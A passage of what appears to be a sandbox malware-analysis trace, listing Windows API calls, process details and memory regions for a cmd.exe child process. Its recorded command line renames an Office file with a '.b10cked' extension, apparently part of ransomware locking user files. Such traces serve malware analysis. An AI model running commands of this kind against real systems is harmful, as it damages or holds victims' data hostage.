lpFindFileData=0x2ce64c) returned 0 [0204.441] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.441] GetLastError () returned 0x12 [0204.442] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x491bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491bd8) returned 0x480e68 [0204.442] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x491bd8 | out: lpFindFileData=0x491bd8) returned 0 [0204.442] FindClose (in: hFindFile=0x480e68 | out: 
hFindFile=0x480e68) returned 1 [0204.442] GetLastError () returned 0x12 [0204.442] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x491bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x491bd8) returned 0x480e68 [0204.442] FindNextFileW (in: hFindFile=0x480e68, lpFindFileData=0x491bd8 | out: lpFindFileData=0x491bd8) returned 0 [0204.442] FindClose (in: hFindFile=0x480e68 | out: hFindFile=0x480e68) returned 1 [0204.442] GetLastError () returned 0x12 [0204.443] _get_osfhandle (_FileHandle=2) returned 0xb [0204.443] GetFileType (hFile=0xb) returned 0x2 [0205.024] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0205.024] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ce81c | out: lpMode=0x2ce81c) returned 1 [0205.024] _get_osfhandle (_FileHandle=2) returned 0xb [0205.024] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2ce850 | out: lpConsoleScreenBufferInfo=0x2ce850) returned 1 [0205.025] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.026] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce890 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.026] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2ce874, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce874*=0x2c) returned 1 [0205.027] longjmp () [0205.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.027] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0205.027] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.027] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.027] SetConsoleInputExeNameW () returned 0x1 [0205.027] GetConsoleOutputCP () returned 0x1b5 [0205.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.027] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.028] exit (_Code=1) Process: id = "467" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29256 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29257 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29258 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29259 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 29260 start_va = 
0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29261 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29262 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29263 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29264 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 29265 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29511 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29512 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29513 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29514 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 29515 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 29516 start_va = 0x6ee80000 end_va = 0x6ee86fff 
entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29517 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29518 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29519 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29520 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29521 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29522 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29523 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29524 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29525 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29526 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29527 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29528 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 29529 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 29530 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 29531 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 29532 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 29533 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 29534 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 29535 start_va = 0x12b0000 end_va = 0x136ffff entry_point = 0x12b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 663 os_tid = 0xd24 [0201.433] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afc2c | out: 
lpSystemTimeAsFileTime=0x2afc2c*(dwLowDateTime=0xacdefaa0, dwHighDateTime=0x1d440a9)) [0201.433] GetCurrentProcessId () returned 0xcc8 [0201.433] GetCurrentThreadId () returned 0xd24 [0201.433] GetTickCount () returned 0x38e2b [0201.433] QueryPerformanceCounter (in: lpPerformanceCount=0x2afc24 | out: lpPerformanceCount=0x2afc24*=25822205069) returned 1 [0201.433] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.433] __set_app_type (_Type=0x1) [0201.433] __p__fmode () returned 0x76b331f4 [0201.434] __p__commode () returned 0x76b331fc [0201.434] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.434] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.434] GetCurrentThreadId () returned 0xd24 [0201.434] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd24) returned 0x38 [0201.434] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.434] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.434] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.434] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.434] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afbbc | out: phkResult=0x2afbbc*=0x0) returned 0x2 [0201.434] VirtualQuery (in: lpAddress=0x2afbf3, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afb8c, dwLength=0x1c | out: lpBuffer=0x2afb8c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.434] GetConsoleOutputCP () returned 0x1b5 [0201.435] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.435] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.435] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.435] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.435] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.435] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.435] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.436] GetEnvironmentStringsW () returned 0x330180* [0201.436] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0201.436] GetEnvironmentStringsW () returned 0x330180* [0201.436] FreeEnvironmentStringsW (penv=0x330180) returned 1 
[0201.436] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb2c | out: phkResult=0x2aeb2c*=0x40) returned 0x0 [0201.436] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0xa8, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x0, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegCloseKey (hKey=0x40) returned 0x0 [0201.437] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb2c | out: phkResult=0x2aeb2c*=0x40) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x0, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegCloseKey (hKey=0x40) returned 0x0 [0201.437] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.437] srand (_Seed=0x5b8863a3) [0201.438] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" [0201.438] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" [0201.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.438] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.438] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.438] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.438] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.438] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.438] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.438] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.438] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.439] GetEnvironmentStringsW () returned 0x3322d0* [0201.439] 
FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0201.439] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.439] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.439] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.439] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.439] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.439] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.439] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.439] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af8f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af8f8, lpFilePart=0x2af8f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af8f4*="Desktop") returned 0x18 [0201.439] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.439] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.439] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.440] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.440] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.440] FindClose (in: 
hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.440] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.440] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.440] GetEnvironmentStringsW () returned 0x332af0* [0201.440] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0201.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.441] GetConsoleOutputCP () returned 0x1b5 [0201.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.441] GetUserDefaultLCID () returned 0x409 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afa38, cchData=128 | out: lpLCData="0") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afa38, cchData=128 | out: lpLCData="0") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afa38, cchData=128 | out: lpLCData="1") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.441] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.441] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.442] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.442] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.442] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.442] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.443] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.443] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.443] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.443] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.443] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.443] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.443] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.443] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.446] GetConsoleTitleW (in: lpConsoleTitle=0x2af730, nSize=0x104 | 